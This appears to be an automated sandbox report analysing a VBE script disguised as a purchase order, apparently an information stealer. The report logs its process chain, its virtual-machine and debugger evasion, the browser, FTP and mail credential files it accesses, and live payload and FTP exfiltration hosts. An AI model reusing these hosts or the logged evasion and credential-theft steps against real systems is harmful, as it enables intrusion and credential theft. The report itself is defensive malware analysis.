          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe
          Source: powershell.exe, 00000004.00000002.1748826369.00000000074DA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEG
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEENT
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104 Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 8152 Thread sleep count: 639 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 8152 Thread sleep time: -319500s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 7104 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9096
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 639
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1F9C0006 sldt word ptr [eax]
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation
          Source: wscript.exe, 00000000.00000003.761029190.0000016BB47B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU = Tox
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
          Source: CasPol.exe, 00000011.00000002.5818301150.00000000014E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: PO-08784 xlsx.vbe Binary or memory string: To3 = To3 & "e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU"
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000004.00000002.1748826369.00000000074DA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeG
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
          Source: CasPol.exe, 00000011.00000002.5826675755.0000000001544000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: powershell.exe, 00000004.00000002.1743148136.00000000073ED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeent
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
          Source: powershell.exe, 00000004.00000002.1786397663.000000000ABA9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat

          Anti Debugging

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread information set: HideFromDebugger
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_20456418 LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          Source: Yara match File source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          Source: Yara match File source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_010E4A7A bind,17_2_010E4A7A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_010E4A55 bind,17_2_010E4A55
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
          Execution: 211 Windows Management Instrumentation; 11 Scripting; 21 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
          Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
          Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 11 Process Injection; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
          Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 11 Scripting; 1 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 351 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection
          Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
          Discovery: 1 File and Directory Discovery; 115 System Information Discovery; 421 Security Software Discovery; 1 Process Discovery; 351 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; Network Service Scanning; System Network Connections Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
          Collection: 1 Archive Collected Data; 2 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
          Exfiltration: 1 Exfiltration Over Alternative Protocol; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
          Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
          Behavior Graph ID: 755441, Sample: PO-08784 xlsx.vbe, Startdate: 28/11/2022, Architecture: WINDOWS, Score: 100
          Root node, DNS/IP: ftp.mcmprint.net; b3solutionscws.com; 2 other IPs or domains
          Root node, signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 5 other signatures
          Process tree:
          • wscript.exe (started)
            Signatures: Wscript starts Powershell (via cmd or directly); Obfuscated command line found; Very long command line found
            • powershell.exe (started by wscript.exe)
              Dropped: C:\Users\user\AppData\...\3uneeqsg.cmdline, Unicode
              Signatures: Tries to detect Any.run; Hides threads from debuggers
              • CasPol.exe (started by powershell.exe)
                DNS/IP: ftp.mcmprint.net 185.31.121.136, 21, 49807, 49808 RAX-ASBG Bulgaria; b3solutionscws.com 192.185.145.188, 49803, 80 UNIFIEDLAYER-AS-1US United States; api.ipify.org.herokudns.com 54.91.59.199, 443, 49805 AMAZON-AESUS United States
                Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 5 other signatures
              • csc.exe (started by powershell.exe)
                Dropped: C:\Users\user\AppData\Local\...\3uneeqsg.dll, PE32
                • cvtres.exe (started by csc.exe)
              • conhost.exe (started by powershell.exe)
            • cmd.exe (started by wscript.exe)
              • conhost.exe (started by cmd.exe)

          Source | Detection | Scanner | Label
          PO-08784 xlsx.vbe | 2% | Virustotal |
          PO-08784 xlsx.vbe | 2% | ReversingLabs |
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label
          api.ipify.org.herokudns.com | 0% | Virustotal |
          ftp.mcmprint.net | 10% | Virustotal |

          Source | Detection | Scanner | Label
          http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb | 0% | Avira URL Cloud | safe
          http://oqyPj4HORVpk3nSGGk.net | 0% | Avira URL Cloud | safe
          http://kmbImL.com | 0% | Avira URL Cloud | safe
          http://pesterbdd.com/images/Pester.png | 100% | Avira URL Cloud | malware
          http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
          http://oqyPj4HORVpk3nSGGk.netXy | 0% | Avira URL Cloud | safe
          https://api.ipify.orgftp://ftp.mcmprint.netklogz | 0% | Avira URL Cloud | safe
          https://contoso.com/ | 0% | Avira URL Cloud | safe
          https://contoso.com/License | 0% | Avira URL Cloud | safe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | Avira URL Cloud | safe
          http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | Avira URL Cloud | safe
          https://contoso.com/Icon | 0% | Avira URL Cloud | safe
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          api.ipify.org.herokudns.com | 54.91.59.199 | true | false | | unknown
          ftp.mcmprint.net | 185.31.121.136 | true | true | | unknown
          b3solutionscws.com | 192.185.145.188 | true | false | | unknown
          api.ipify.org | unknown | unknown | false | | high
          Name | Malicious | Antivirus Detection | Reputation
          https://api.ipify.org/ | false | | high
          http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb | false | Avira URL Cloud: safe | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://kmbImL.com | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://127.0.0.1:HTTP/1.1 | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
          http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://api.ipify.org | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://oqyPj4HORVpk3nSGGk.net | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
          http://oqyPj4HORVpk3nSGGk.netXy | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://aka.ms/pscore6lB | powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
          http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://api.ipify.orgftp://ftp.mcmprint.netklogz | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
          https://contoso.com/ | powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://contoso.com/License | powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://DynDns.comDynDNSnamejidpasswordPsi/Psi | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://contoso.com/Icon | powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmp | false | | high
          IP | Domain | Country | ASN | ASN Name | Malicious
          54.91.59.199 | api.ipify.org.herokudns.com | United States | 14618 | AMAZON-AESUS | false
          192.185.145.188 | b3solutionscws.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
          185.31.121.136 | ftp.mcmprint.net | Bulgaria | 199364 | RAX-ASBG | true
          Joe Sandbox Version: 36.0.0 Rainbow Opal
          Analysis ID: 755441
          Start date and time: 2022-11-28 18:09:14 +01:00
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 17m 46s
          Hypervisor based Inspection enabled: false
          Report type: full
          Sample file name: PO-08784 xlsx.vbe
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
          Run name: Suspected Instruction Hammering
          Number of analysed new started processes analysed: 22
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.troj.spyw.expl.evad.winVBE@13/10@3/3
          EGA Information:
          • Successful, ratio: 100%
          HDC Information: Failed
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 358
                              • Number of non-executed functions: 14
                              Cookbook Comments:
                              • Found application associated with file extension: .vbe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 52.242.97.97, 40.125.122.151
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
